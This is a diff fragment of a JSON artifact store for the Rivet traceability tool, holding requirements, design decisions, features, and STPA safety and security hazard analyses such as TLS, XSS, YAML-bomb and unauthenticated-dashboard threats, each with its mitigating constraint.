+      "description": "The OSLC HTTP client provides sync requests to remote servers without enforcing certificate validation (or with validation disabled by configuration), allowing MITM interception.\n",
+      "id": "SUCA-OSLC-2",
+      "links": [
+        {
+          "target": "CTRL-OSLC",
+          "type": "issued-by"
+        },
+        {
+          "target": "SH-1",
+          "type": "leads-to-sec-hazard"
+        },
+        {
+          "target": "SH-3",
+          "type": "leads-to-sec-hazard"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "OSLC sync does not verify TLS certificate authenticity",
+      "type": "sec-uca"
+    },
+    {
+      "description": "A maliciously crafted artifact file (YAML bomb, extremely deep anchor chain, or enormous field values) can cause Rivet to exhaust memory or CPU, denying the tool to legitimate users.  CI pipelines that run 'rivet validate' on every commit are especially vulnerable to supply-chain-injected input.\n",
+      "id": "SH-6",
+      "links": [
+        {
+          "target": "SL-3",
+          "type": "leads-to-sec-loss"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Rivet accepts YAML/ReqIF input that triggers resource exhaustion",
+      "type": "sec-hazard"
+    },
+    {
+      "description": "Markdown-to-HTML rendering with wiki-link resolution, artifact embedding, and document-to-document cross-references.\n",
+      "id": "ARCH-CORE-MARKDOWN",
+      "links": [
+        {
+          "target": "REQ-032",
+          "type": "allocated-from"
+        },
+        {
+          "target": "REQ-033",
+          "type": "allocated-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "architecture",
+        "documents",
+        "rendering"
+      ],
+      "title": "Document Rendering Engine",
+      "type": "aadl-component"
+    },
+    {
+      "description": "\nWhen creating or updating links to external artifacts (OSLC URIs,\n\ngit commits,\nfile references),\nRivet must verify that the target\n\nexists and is reachable at link-creation time,\nrecording the\n\nverification timestamp.\n",
+      "id": "SC-10",
+      "links": [
+        {
+          "target": "H-1",
+          "type": "prevents"
+        },
+        {
+          "target": "H-3",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet must validate external artifact existence before accepting links",
+      "type": "system-constraint"
+    },
+    {
+      "description": "Core library process containing all domain logic: config loading, schema merging, artifact storage, adapter dispatch, graph building, validation, matrix computation, diff, documents, and query.\n",
+      "id": "ARCH-CORE-001",
+      "links": [
+        {
+          "target": "REQ-001",
+          "type": "allocated-from"
+        },
+        {
+          "target": "REQ-002",
+          "type": "allocated-from"
+        },
+        {
+          "target": "ARCH-CORE-SCHEMA",
+          "type": "contains"
+        },
+        {
+          "target": "ARCH-CORE-STORE",
+          "type": "contains"
+        },
+        {
+          "target": "ARCH-CORE-ADAPTERS",
+          "type": "contains"
+        },
+        {
+          "target": "ARCH-CORE-GRAPH",
+          "type": "contains"
+        },
+        {
+          "target": "ARCH-CORE-VALIDATE",
+          "type": "contains"
+        },
+        {
+          "target": "ARCH-CORE-MATRIX",
+          "type": "contains"
+        },
+        {
+          "target": "ARCH-CORE-DIFF",
+          "type": "contains"
+        },
+        {
+          "target": "ARCH-CORE-DOC",
+          "type": "contains"
+        },
+        {
+          "target": "ARCH-CORE-QUERY",
+          "type": "contains"
+        },
+        {
+          "target": "ARCH-CORE-RESULTS",
+          "type": "contains"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "aadl",
+        "architecture",
+        "core"
+      ],
+      "title": "RivetCore process",
+      "type": "aadl-component"
+    },
+    {
+      "description": "Extend rivet impact to use the binding model for variant-scoped change propagation. Given a changed source file, identify affected features via source globs, then identify affected variants that include those features. Report which variants need re-validation based on which files changed.\n",
+      "id": "FEAT-114",
+      "links": [
+        {
+          "target": "REQ-045",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-024",
+          "type": "satisfies"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "variant",
+        "impact",
+        "future"
+      ],
+      "title": "Variant-aware impact analysis",
+      "type": "feature"
+    },
+    {
+      "description": "Direct STPA validation without trace.yaml — point at an STPA directory and validate against STPA schema.\n",
+      "id": "FEAT-008",
+      "links": [
+        {
+          "target": "REQ-007",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-002",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "cli",
+        "stpa",
+        "phase-1"
+      ],
+      "title": "CLI stpa command",
+      "type": "feature"
+    },
+    {
+      "description": "Support pluggable adapters as WASM components via WIT interface. Adapters can import/export artifacts for custom formats.\n",
+      "id": "REQ-008",
+      "links": [
+        {
+          "target": "SC-16",
+          "type": "satisfies"
+        },
+        {
+          "target": "SC-16",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-C-21",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-C-22",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-C-23",
+          "type": "constraint-satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "extensibility",
+        "wasm"
+      ],
+      "title": "WASM component adapters",
+      "type": "requirement"
+    },
+    {
+      "description": "\nThe Datalog evaluator or constraint propagation enters a long-running\n\nor non-terminating computation on a feature model with many cross-tree\n\nconstraints. While Datalog guarantees termination in theory,\na bug in\n\nthe semi-naive evaluator (e.g.,\nmissing fixpoint check) or pathological\n\nconstraint interaction could cause the solver to spin. In CI,\nthis\n\nmanifests as a hung validation step.\n",
+      "id": "H-VAR-006",
+      "links": [
+        {
+          "target": "L-4",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Constraint solver non-termination or excessive runtime on large feature models",
+      "type": "hazard"
+    },
+    {
+      "description": "Use standard git trailers (footer key-value pairs) for linking commits to artifacts, rather than inline regex parsing of commit message bodies (e.g., [FEAT-007] Jira-style).\n",
+      "id": "DD-011",
+      "links": [
+        {
+          "target": "REQ-017",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "architecture",
+        "git",
+        "traceability"
+      ],
+      "title": "Git trailers over inline regex for commit-artifact references",
+      "type": "design-decision"
+    },
+    {
+      "description": "\nCore incremental validation produces different diagnostics than\n\na clean full validation pass for the same inputs.\n",
+      "id": "UCA-C-13",
+      "links": [
+        {
+          "target": "H-9",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CORE",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "Before incorporating any artifact data from an external source (YAML file, ReqIF import, OSLC sync), Rivet must verify the source is expected and the content matches a known-good baseline or carries a valid signature.  At minimum, Rivet must log the source URL, content hash, and import timestamp for every import operation.\n",
+      "id": "SSC-1",
+      "links": [
+        {
+          "target": "SH-1",
+          "type": "prevents-sec-hazard"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Rivet must validate the provenance and integrity of all imported artifact data",
+      "type": "sec-constraint"
+    },
+    {
+      "description": "\nYAML artifact files in the git working tree,\norganized by schema\n\ndomain (stpa,\naspice,\ncybersecurity,\ndev,\naadl).  The local\n\nsource of truth for all traceability data.\n",
+      "id": "PROC-ARTIFACTS",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Local Artifact Store",
+      "type": "controlled-process"
+    },
+    {
+      "description": "Rivet must be capable of detecting that stored artifacts have been modified outside of a sanctioned Rivet operation.  The reference implementation is git-based integrity: the store is a git repository and Rivet can compare the working tree to the last verified commit. Any detected drift must be surfaced as a validation error before reports or exports are generated.\n",
+      "id": "SSC-2",
+      "links": [
+        {
+          "target": "SH-2",
+          "type": "prevents-sec-hazard"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Rivet must detect and report unauthorized modifications to the artifact store",
+      "type": "sec-constraint"
+    },
+    {
+      "description": "",
+      "id": "CC-I-1",
+      "links": [
+        {
+          "target": "CTRL-CI",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-I-1",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-1",
+          "type": "prevents"
+        },
+        {
+          "target": "H-3",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "Use axum HTTP server with HTMX for the dashboard, following the temper project's pattern. No Tauri or SPA framework.\n",
+      "id": "DD-005",
+      "links": [
+        {
+          "target": "REQ-007",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "architecture",
+        "ui"
+      ],
+      "title": "axum + HTMX serve pattern",
+      "type": "design-decision"
+    },
+    {
+      "description": "\nChanges to artifacts with safety implications (requirements,\nhazard\n\nanalyses,\nverification records) occur without recording who made\n\nthe change,\nwhen,\nor why.  The audit trail is incomplete.\n",
+      "id": "H-7",
+      "links": [
+        {
+          "target": "L-3",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-5",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-6",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet allows unattributed modification of safety-critical artifacts",
+      "type": "hazard"
+    },
+    {
+      "description": "Tests for build-system providers (FEAT-044 through FEAT-046). Verifies Bazel MODULE.bazel parsing for bazel_dep() and git_override(), Nix flake.lock input pin parsing, custom JSON provider reading, repo URL resolution, pinned commit extraction, workspace path resolution, and rowan CST construction for the Starlark subset grammar.\n",
+      "id": "TEST-023",
+      "links": [
+        {
+          "target": "REQ-027",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-028",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "cross-repo",
+        "bazel",
+        "nix",
+        "swe-5"
+      ],
+      "title": "Build-system dependency provider tests",
+      "type": "feature"
+    },
+    {
+      "description": "\nCI pipeline does not block merge when rivet validate fails.\n",
+      "id": "UCA-I-2",
+      "links": [
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-6",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CI",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "\nCLI writes sync results to YAML files while the developer\n\nis actively editing those same files.\n",
+      "id": "UCA-L-5",
+      "links": [
+        {
+          "target": "H-5",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-7",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CLI",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "\nCI runs validation against an outdated artifact baseline\n\nbecause it does not pull the latest changes.\n",
+      "id": "UCA-I-4",
+      "links": [
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CI",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "\nCore lifecycle completeness check uses a hardcoded downstream\n\ntype map that does not reflect the loaded schema's traceability\n\nrules.\n",
+      "id": "UCA-C-24",
+      "links": [
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CORE",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "",
+      "id": "CC-C-4",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-C-4",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-1",
+          "type": "prevents"
+        },
+        {
+          "target": "H-3",
+          "type": "prevents"
+        },
+        {
+          "target": "H-6",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "",
+      "id": "CC-VAR-003",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-VAR-003",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-VAR-003",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Binding staleness check must precede variant scoping",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "",
+      "id": "CC-O-7",
+      "links": [
+        {
+          "target": "CTRL-OSLC",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-O-7",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-8",
+          "type": "prevents"
+        },
+        {
+          "target": "H-4",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "A compromised VS Code extension spawns a rivet MCP subprocess and calls rivet_list to enumerate all project artifacts including security-sensitive design decisions and vulnerability assessments.\n",
+      "id": "SLS-IMPL-001",
+      "links": [
+        {
+          "target": "SUCA-MCP-1",
+          "type": "caused-by-sec-uca"
+        },
+        {
+          "target": "SH-IMPL-002",
+          "type": "leads-to-sec-hazard"
+        }
+      ],
+      "status": "draft",
+      "tags": [],
+      "title": "Malicious VS Code extension queries artifacts via MCP",
+      "type": "sec-scenario"
+    },
+    {
+      "description": "Rivet's artifact store, dashboard, or OSLC sync channel becomes unavailable, blocking safety engineers from accessing or updating traceability evidence.  In a certification crunch or incident response scenario, loss of traceability access directly delays safety work.\n",
+      "id": "SL-3",
+      "links": [],
+      "status": "approved",
+      "tags": [],
+      "title": "Availability loss — traceability infrastructure denied to engineers",
+      "type": "sec-loss"
+    },
+    {
+      "description": "\nVersion-controlled repository containing artifact YAML files,\n\nconfiguration,\nand code.  Provides the audit trail via commit\n\nhistory and enables conflict detection via merge semantics.\n",
+      "id": "PROC-GITREPO",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Git Repository",
+      "type": "controlled-process"
+    },
+    {
+      "description": "Use Rust edition 2024. Maintain minimum supported Rust version of 1.85.\n",
+      "id": "REQ-011",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "toolchain"
+      ],
+      "title": "Rust edition 2024 with MSRV 1.85",
+      "type": "requirement"
+    },
+    {
+      "description": "\nAfter a WASM adapter returns imported artifacts,\nthe host must\n\nverify that:\n(a) the number of returned artifacts is consistent\n\nwith the source data size,\n(b) all returned artifact IDs conform\n\nto expected patterns,\n(c) no artifact IDs were injected that do\n\nnot correspond to source records. Schema validation alone is\n\ninsufficient because a compromised adapter could produce\n\nschema-conforming but fabricated artifacts.\n",
+      "id": "SC-16",
+      "links": [
+        {
+          "target": "H-14",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet must validate WASM adapter outputs against the source data independently",
+      "type": "system-constraint"
+    },
+    {
+      "description": "\nSchema mappings (OSLC resource shapes,\nReqIF SpecTypes,\nadapter\n\ntransforms) must be explicitly defined and validated before data\n\nflows through them.  Unmapped or ambiguously mapped fields must\n\ncause a hard error,\nnot a silent default.\n",
+      "id": "SC-4",
+      "links": [
+        {
+          "target": "H-4",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet must verify semantic compatibility when mapping between schemas",
+      "type": "system-constraint"
+    },
+    {
+      "description": "\nMODULE.bazel contains both bazel_dep(version=\"1.0\") and\n\ngit_override(commit=\"abc123\"). The parser extracts the registry\n\nversion but misses the override,\ncausing validation against the\n\nwrong repo checkout.\n",
+      "id": "H-11.1",
+      "links": [
+        {
+          "target": "H-11",
+          "type": "refines"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet parser ignores git_override and uses registry version instead",
+      "type": "sub-hazard"
+    },
+    {
+      "description": "Use Rust edition 2024 with MSRV 1.85. CI enforces fmt, clippy -D warnings, tests, RustSec audit, cargo-deny, code coverage, Miri, proptest, cargo-vet supply chain, and MSRV check.\n",
+      "id": "DD-008",
+      "links": [
+        {
+          "target": "REQ-011",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-012",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "toolchain",
+        "ci"
+      ],
+      "title": "Rust edition 2024 with comprehensive CI",
+      "type": "design-decision"
+    },
+    {
+      "description": "\nCLI sync command executes git clone against an arbitrary URL from\n\nrivet.yaml without validating the URL or disabling git hooks.\n",
+      "id": "UCA-L-6",
+      "links": [
+        {
+          "target": "H-17",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CLI",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "Any repo can link to any other repo directly. No central authority required.\n",
+      "id": "DD-015",
+      "links": [
+        {
+          "target": "REQ-020",
+          "type": "satisfies"
+        }
+      ],
+      "status": "accepted",
+      "tags": [
+        "cross-repo"
+      ],
+      "title": "Mesh topology over hub-and-spoke",
+      "type": "design-decision"
+    },
+    {
+      "description": "\nThe MCP server returns cached validation results,\ncoverage metrics,\n\nor artifact lists that do not reflect the current disk state. An AI\n\nagent makes decisions based on stale data. In a worst-case environment\n\nwhere the agent has autonomy to commit and push,\nstale MCP results\n\npropagate into the main branch.\n",
+      "id": "H-21",
+      "links": [
+        {
+          "target": "L-1",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-2",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-5",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet MCP server provides stale validation state to AI agents",
+      "type": "hazard"
+    },
+    {
+      "description": "CLI binary process: dispatches subcommands (validate, list, stats, matrix, stpa, serve) and hosts the HTTP dashboard.\n",
+      "id": "ARCH-CLI-001",
+      "links": [
+        {
+          "target": "REQ-007",
+          "type": "allocated-from"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "aadl",
+        "architecture",
+        "cli"
+      ],
+      "title": "RivetCli process",
+      "type": "aadl-component"
+    },
+    {
+      "description": "\nTwo branches modify different fields of the same artifact in\n\nthe same YAML file.  Git's line-based merge algorithm resolves\n\nthe merge automatically (no conflict markers),\nbut the result\n\nis semantically invalid — e.g.,\na link was added in one branch\n\nwhile the artifact's type was changed in another,\ncreating a\n\nlink type mismatch.  The merge commits without triggering\n\nvalidation,\nand the invalid state reaches the main branch.\n",
+      "id": "LS-CP-1",
+      "links": [
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-5",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-7",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Git merge silently resolves YAML conflicts incorrectly",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "\nReqIF adapter imports artifacts with incorrect schema mapping,\n\nassigning wrong types or statuses.\n",
+      "id": "UCA-Q-3",
+      "links": [
+        {
+          "target": "H-4",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-REQIF",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "\nWhen importing ReqIF XHTML or OSLC rich-text,\nRivet must either\n\npreserve the structural markup or explicitly warn that content\n\nhas been simplified,\nso users can verify no semantic information\n\nwas lost.\n",
+      "id": "SC-9",
+      "links": [
+        {
+          "target": "H-4",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet must preserve rich-text structure during import and export",
+      "type": "system-constraint"
+    },
+    {
+      "description": "Validation engine downgrades traceability rule violations from error to info for artifacts with status \"draft\". Missing required links on draft artifacts produce informational diagnostics (\"link not yet established\") rather than errors. Active/approved artifacts enforce full traceability. Configurable via schema field \"enforce-links-for-status\" with default [\"active\", \"approved\"].\n",
+      "id": "FEAT-070",
+      "links": [
+        {
+          "target": "REQ-039",
+          "type": "satisfies"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "validation",
+        "workflow",
+        "phase-3"
+      ],
+      "title": "Draft-aware validation severity",
+      "type": "feature"
+    },
+    {
+      "description": "A developer adds 'rivet serve' to a CI job for preview purposes. The CI runner has a public IP and no firewall rule restricts port 3000. The default bind address is 0.0.0.0 (or the developer passes '--bind 0.0.0.0').  An external attacker discovers the port via shodan or port scanner, connects, and downloads all artifacts via the /artifacts and /documents endpoints without any authentication.\n",
+      "id": "SLS-7",
+      "links": [
+        {
+          "target": "SUCA-DASH-1",
+          "type": "caused-by-sec-uca"
+        },
+        {
+          "target": "SH-3",
+          "type": "leads-to-sec-hazard"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Unauthenticated dashboard on CI runner exposes artifacts to internet",
+      "type": "sec-scenario"
+    },
+    {
+      "description": "\nThe markdown-to-HTML renderer in document.rs processes artifact\n\ndescriptions,\ntitles,\nand field values into HTML output for the\n\ndashboard and document views. If artifact content contains HTML\n\nentities,\nscript tags,\nor event handler attributes that are not\n\nproperly escaped,\nthe rendered output enables cross-site scripting\n\n(XSS) in the dashboard. In a worst-case environment where the\n\ndashboard is used during an audit review or shared via screen\n\nrecording,\ninjected scripts could alter displayed traceability\n\ndata,\nexfiltrate session information,\nor modify the visual\n\npresentation of compliance metrics.\n",
+      "id": "H-13",
+      "links": [
+        {
+          "target": "L-1",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-2",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-3",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet document renderer produces HTML containing unescaped artifact content",
+      "type": "hazard"
+    },
+    {
+      "description": "\nThe OSLC client begins a sync operation that takes several minutes\n\n(large change log).  Midway through,\nthe OAuth token expires.\n\nSubsequent TRS page fetches return 401 Unauthorized,\nbut the client\n\ntreats this as an empty page (no more changes) rather than an error.\n\nThe sync appears to complete successfully [UCA-O-3],\nbut only half\n\nthe change log was processed.  The developer proceeds to generate\n\nreports from the incomplete sync state [H-6,\nH-1].\n",
+      "id": "LS-O-5",
+      "links": [
+        {
+          "target": "UCA-O-3",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-6",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Authentication token expiry during long sync",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "\nBroken,\nmissing,\nor stale links between requirements,\ndesign decisions,\n\nimplementation artifacts,\nand test evidence.  In safety-critical domains\n\n(ISO 26262,\nDO-178C,\nASPICE),\nincomplete traceability can mask gaps that\n\nlead to fielded defects in safety-relevant functions.\n",
+      "id": "L-1",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Loss of traceability integrity",
+      "type": "loss"
+    },
+    {
+      "description": "\nEach MCP tool call loads fresh project state from disk.\n\nNo caching across calls. This ensures consistency at the\n\ncost of performance (acceptable for agent interaction).\n",
+      "id": "SC-IMPL-003",
+      "links": [
+        {
+          "target": "H-IMPL-003",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "MCP tools MUST reload project state on each call",
+      "type": "system-constraint"
+    },
+    {
+      "description": "Compute source-to-target traceability matrices with coverage percentages. Support forward and backward directions.\n",
+      "id": "FEAT-006",
+      "links": [
+        {
+          "target": "REQ-004",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "reporting",
+        "phase-1"
+      ],
+      "title": "Traceability matrix computation",
+      "type": "feature"
+    },
+    {
+      "description": "Schema semantics (traceability rule systems, conditional rules, link type algebra) are modeled in Rocq via coq-of-rust translation. Properties proven include schema satisfiability, rule consistency, monotonicity, and ASPICE V-model completeness. Rocq proofs serve as the formal specification against which the Rust implementation is validated.\n",
+      "id": "DD-027",
+      "links": [
+        {
+          "target": "REQ-030",
+          "type": "satisfies"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "formal-verification",
+        "rocq",
+        "metamodel"
+      ],
+      "title": "Rocq metamodel proofs for schema semantics",
+      "type": "design-decision"
+    },
+    {
+      "description": "Model Context Protocol server over JSON-RPC 2.0 stdio. Three initial tools: rivet_validate, rivet_list, rivet_stats. Compatible with Claude Code, Cursor, and other MCP-capable agents.\n",
+      "id": "FEAT-080",
+      "links": [
+        {
+          "target": "REQ-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "MCP server with stdio transport",
+      "type": "feature"
+    },
+    {
+      "description": "\nThe developer edits an artifact YAML file and saves it to disk.\n\nThe salsa database's file-content input query was set when the\n\nfile was first read. Because there is no file-watcher or\n\nexplicit invalidation call between validation invocations in\n\nthe same process (e.g.,\nduring `rivet serve`),\nthe salsa\n\ndatabase returns the cached parse result from the old file\n\ncontents [UCA-C-10]. The link graph and validation diagnostics\n\nreflect the pre-edit state. The dashboard shows \"0 errors\"\n\nwhile the file on disk contains broken links [H-1,\nH-3].\n",
+      "id": "LS-C-5",
+      "links": [
+        {
+          "target": "UCA-C-10",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-9",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Salsa input query not updated after file write",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "\nThe evaluator must use deterministic data structures (BTreeMap,\nsorted\n\niteration) and avoid floating-point in boolean logic. Validation\n\nresults for the same inputs must be byte-identical across platforms,\n\ncompiler versions,\nand repeated runs.\n",
+      "id": "SC-VAR-007",
+      "links": [
+        {
+          "target": "H-VAR-007",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Validation results must be deterministic across platforms and runs",
+      "type": "system-constraint"
+    },
+    {
+      "description": "\nEach variant passes validation independently. However,\na shared\n\ncomponent (bound to multiple features across variants) has a\n\ntraceability gap that only manifests when two specific features\n\nare combined in the same variant. No defined variant includes both\n\nfeatures,\nso the gap is never checked. This is a limitation of\n\nvariant-based validation — it only checks defined configurations,\n\nnot all possible combinations.\n",
+      "id": "LS-VAR-004",
+      "links": [
+        {
+          "target": "UCA-VAR-005",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-VAR-001",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-VAR-005",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "--all-variants passes each variant individually but misses cross-variant gap",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "CI pipeline must include fmt, clippy -D warnings, tests, security audit, cargo-deny, code coverage, Miri, proptest, supply chain verification, and MSRV check.\n",
+      "id": "REQ-012",
+      "links": [
+        {
+          "target": "CC-I-1",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-I-2",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-I-3",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-I-4",
+          "type": "constraint-satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "ci",
+        "quality"
+      ],
+      "title": "Comprehensive CI quality gates",
+      "type": "requirement"
+    },
+    {
+      "description": "\nTwo or more conditional rules fire on the same artifact and impose\n\ncontradictory requirements (e.g.,\nrule A requires field X when\n\nstatus=approved,\nrule B forbids field X when safety=ASIL_B).\n\nNo valid artifact configuration exists,\nbut the tool does not\n\ndetect the inconsistency,\ncausing perpetual validation failures\n\nthat engineers work around by disabling rules.\n",
+      "id": "H-10",
+      "links": [
+        {
+          "target": "L-1",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-4",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-5",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet conditional validation rules contradict, making compliance impossible",
+      "type": "hazard"
+    },
+    {
+      "description": "Add or remove links between artifacts from the command line. rivet link <source-id> --type <link-type> --target <target-id> validates that both artifacts exist, the link type exists in the schema, the link type is valid for the source and target artifact types, and cardinality constraints are not violated. rivet unlink removes an existing link with the same validations. Supports cross-repo references (prefix:ID syntax).\n",
+      "id": "FEAT-055",
+      "links": [
+        {
+          "target": "REQ-031",
+          "type": "satisfies"
+        },
+        {
+          "target": "SC-1",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-028",
+          "type": "implements"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "cli",
+        "mutation",
+        "traceability",
+        "phase-3"
+      ],
+      "title": "rivet link / unlink — manage artifact links from CLI",
+      "type": "feature"
+    },
+    {
+      "description": "\nReqIF adapter does not export locally-deleted artifacts,\n\nfailing to communicate the deletion to downstream tools.\n",
+      "id": "UCA-Q-2",
+      "links": [
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-5",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-REQIF",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "Document pages in HTML export with resolved [[ID]] wiki-links and {{artifact:ID}} embeds.\n",
+      "id": "FEAT-062",
+      "links": [
+        {
+          "target": "REQ-035",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "export",
+        "documents",
+        "phase-3"
+      ],
